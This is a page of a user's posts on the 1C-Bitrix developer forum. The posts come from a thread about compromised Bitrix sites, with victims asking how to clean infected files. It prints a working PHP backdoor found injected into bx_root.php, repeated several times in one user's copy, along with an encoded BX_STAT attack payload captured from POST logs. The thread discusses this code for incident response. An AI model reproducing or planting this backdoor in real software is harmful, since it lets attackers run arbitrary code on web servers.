1С-Битрикс Разработчикам - Станислав Х (Все сообщения пользователя)

Станислав Х (Все сообщения пользователя)

Взломаны сайты в честь дня конституции украины

Пользователь 2624465 Заглянувший Сообщений: 6 Регистрация: 21.09.2020	# 01.04.2023 18:48:17 подскажите что должно быть в оригинальном файле urlrewrite.php
	Перейти

Взломаны сайты в честь дня конституции украины

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

26.03.2023 11:09:26

Цитата
написал: Станислав Х, обновления актуальны?

к сожалению нет.

+ решение хамелеон не обновлялось
9 ИМ стоит.

Перейти

Взломаны сайты в честь дня конституции украины

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

21.03.2023 16:00:42

подскажите пожалуйста
надоело удалять зараженные фацлы в корне сайта
в папке админ они создаваться перестали

сегодня сайт ломанули он перестал открываться
востановил бекап все включилось

сколько стоит решить этот вопрос раз и на всегда и кто может в этом помочь?

Перейти

Взломаны сайты в честь дня конституции украины

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

02.03.2023 22:03:27

Цитата

написал:

Цитата
написал: bitrix/managed_cache/

Просто удаляете эту папку.

она сразу появлятся обратно

Перейти

Взломаны сайты в честь дня конституции украины

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

02.03.2023 11:07:29

Цитата

написал:
ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Стоит решение хамелеон с 10 торгующими лендингами. Существует ли риск потерять все это после обновления?

Перейти

Взломаны сайты в честь дня конституции украины

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

02.03.2023 10:52:40

Цитата

написал:
Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:

Код

  array  (  
  'BX_STAT'  =>  '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r' , 
)

обнаружил код в файле \bitrix\modules\main\bx_root.php

Код

   <? 
  if  ( isset ( $_POST [ "BX_STAT" ]) &&  $_POST [ "BX_STAT" ] <>  "" )    parse_str(hex2bin(str_rot13( $_POST [ "BX_STAT" ])), $bx_stat )  or   die (str_rot13(bin2hex( $bx_stat [ 0 ]( $bx_stat [ 1 ], $bx_stat [ 2 ]))));
  ?>

Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.

P.S Битрикс 18.5.180.

у меня в этом файле вот что

Код

<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
   $fname1 = realpath(__FILE__);
   $fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}

if(strpos($fname1, $fname2)===0)
{
   $fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
   $bx_root = substr($fname1, strlen($fname3));
   $bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
   $bx_root = "/bitrix";

$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);

if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
   define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
   define("BX_PERSONAL_ROOT", BX_ROOT);

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));


if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>

Перейти

Станислав Х (Все сообщения пользователя)

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером